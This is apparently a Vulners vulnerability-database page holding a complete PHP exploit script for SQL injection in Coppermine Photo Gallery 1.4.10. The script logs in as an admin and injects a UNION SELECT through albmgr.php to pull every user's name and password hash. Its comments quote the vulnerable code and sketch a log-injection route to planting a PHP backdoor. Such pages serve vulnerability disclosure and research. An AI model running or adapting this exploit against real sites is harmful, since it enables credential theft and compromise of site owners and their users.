Vulners
Lucene search
coppermine-php.txt
`#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
if($argc < 4)
{
print "\n---------------------------------------------------------";
print "\nAffected.scr..: Coppermine Photo Gallery <= 1.4.10";
print "\nPoc.ID........: 19070104";
print "\nType..........: SQL Injection";
print "\nRisk.level....: Medium";
print "\nSrc.download..: coppermine-gallery.net";
print "\nPoc.link......: acid-root.new.fr/poc/19070104.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url> <adminuser> <adminpass>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://c.com/ admin passwd";
print "\n---------------------------------------------------------\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if(!empty($pxs)){
print "\nstatus> Using a proxy $pxs";
$xpl->proxy($pxs);
}
if(!empty($pxa)){
print "\nstatus> Basic proxy authentification $pxa";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url.'include/index.html');
if(preg_match("#Coppermine version: ([0-9]*\.[0-9]*\.[0-9]*)#",$xpl->getcontent(),$matches)) print "\nsploit> Coppermine version ".$matches[1];
else print "\nsploit> Not found";
$table = !empty($matches[1]) ? 'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';
/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl->getcontent())) print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");
/*/
(usermgr.php)
=============
case 'group_alb_access' :
if (isset($_GET['gid'])) $group_id = $_GET['gid'];
$sql = "SELECT group_name FROM [...] WHERE group_id = $group_id [...]";
$result = cpg_db_query($sql);
(db_ecard.php)
==============
$start = isset($_REQUEST['start']) ? $_REQUEST['start'] : ''; [...]
if (!$start) {$startFrom = '0';}else{$startFrom=$start;} [...]
$result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection LIMIT $startFrom,$countTo");
(albmgr.php)
============
$cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
if ($cat == 1) $cat = 0;
if (GALLERY_ADMIN_MODE) {
$result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY pos ASC");
(filename_to_title())
=====================
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
(del_titles())
==============
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : '';
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
/*/
print "\nstatus> Retrieving all members password";
$xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#<option value=\"album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl->getcontent(),$matches)) print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");
print "\nsploit> +----------------------------------+----------+";
print "\nsploit> | PASSWORD | USER |";
print "\nsploit> +----------------------------------+----------+";
/*/
(init.inc.php)
==============
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => ''');
[...]
if (is_array($_POST)) { // and GET, SERVER, REQUEST...
foreach ($_POST as $key => $value) {
if (!is_array($value))
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key);
}
... that's why we use the html_entity_decode() function.
I just wanted < for a remote php code execution sploit without admin rights :'(.
When the admin view the security logs, it include "security.log.php"...
(security.log.php)
==================
[...]
if (!defined('IN_COPPERMINE')) die(); ?>
Denied privileged access to viewlog.php from user Guest at on January 4, 2007, 2:10 pm
Failed login attempt with Username: <?php mail(you); [...] fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at 01:16 PM
/*/
for($i=0;$i<count($matches[0]);$i++)
{
print "\nsploit> | ".$matches[2][$i].' | '.html_entity_decode($matches[1][$i]);
if($i==(count($matches[0])-1)){
print "\nsploit> +----------------------------------+----------+\n";
}
}
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4